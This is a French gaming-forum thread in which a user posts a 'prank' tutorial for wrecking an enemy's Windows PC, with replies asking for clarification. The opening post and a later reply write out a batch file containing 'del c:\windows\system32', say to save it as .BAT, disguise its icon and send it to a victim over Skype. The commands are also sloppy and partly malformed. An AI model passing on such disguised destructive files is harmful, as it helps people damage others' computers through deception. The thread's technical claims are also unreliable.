• Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies. En savoir plus.
Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - YOUPASS - convertir le crédit téléphonique en monnaie ! : Partenaire RealityGaming.fr - RealityGaming

Comment faire supprimer les fichier Windows a quelqun a distance

Statut
N'est pas ouverte pour d'autres réponses.

WiZz-

Membre Premium
Premium
Inscrit
8 Janvier 2012
J'aime
222
Reply from WiZz- Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #1
HELLLLO tout le monde, je vous retrouve pour une blague tres mechant a faire a vos pire enemie

ATTENTION: Moi meme et Reality Gaming somme pas responsable de cette "blague",si vous suiver ce tuto vous etes totalement responsable a vos risque et péril

Le but et de créé une commande qui va permette de supprimer le systeme32 d'un ordinateur(c'est un peu la base du hacking)

Etape 1 Forum de libres discussions autour du jeux vidéo (cheats, glitches, hacks, modding, réalité virtuelle VR, cryptomonnaies) - :o - RealityGaminguvrir un bloc note

Etape 2 : entre ceci
echo off:
del c:\windows\system32

Etape 3 : Faire fichier,enrengistré sous, nomélecommevousvoulé.BAT
(NE pas oublier le .BAT)

Etape 4 :Faire en sorte pour changer l'icon du fichier .:rechercher: sur google

Voila envoyer le sur Skype ou une autre plateforme BYYYEE

Inscrit
18 Juillet 2012
J'aime
1
Reply from ConTiNuiTyX Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #2
merci du partage et utile pour les gens très chiants!

WiZz-

Membre Premium
Premium
Inscrit
8 Janvier 2012
J'aime
222
Reply from WiZz- Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #3
Merci n'oublie pas le j'aime sa fait toujours plaisir

Inscrit
11 Décembre 2011
J'aime
76
Reply from Joking1209 Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #4
j'ai pas compris faut faire ??

WiZz-

Membre Premium
Premium
Inscrit
8 Janvier 2012
J'aime
222
Reply from WiZz- Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #5
Bas si tu veux detruire ton PC un conseille non mais bon

Inscrit
11 Janvier 2012
J'aime
4
Reply from MaZaToRa75 Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #6
Il faut ecrire que de del a windows ?

WiZz-

Membre Premium
Premium
Inscrit
8 Janvier 2012
J'aime
222
Reply from WiZz- Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #7
?? je cromprend pas

Inscrit
11 Janvier 2012
J'aime
4
Reply from MaZaToRa75 Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #8
Sur le bloc note , il faut écrire echo off:
del:\vindows\system32
ou juste : del:\windows\system32 ?

WiZz-

Membre Premium
Premium
Inscrit
8 Janvier 2012
J'aime
222
Reply from WiZz- Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #9
non sa @
Vous devez vous inscrire pour voir les liens !
off:
del c:\windows\system32

Inscrit
11 Janvier 2012
J'aime
4
Reply from MaZaToRa75 Forums généraux Informatique Windows : Comment faire supprimer les fichier Windows a quelqun a distance #10
ok merci

Statut
N'est pas ouverte pour d'autres réponses.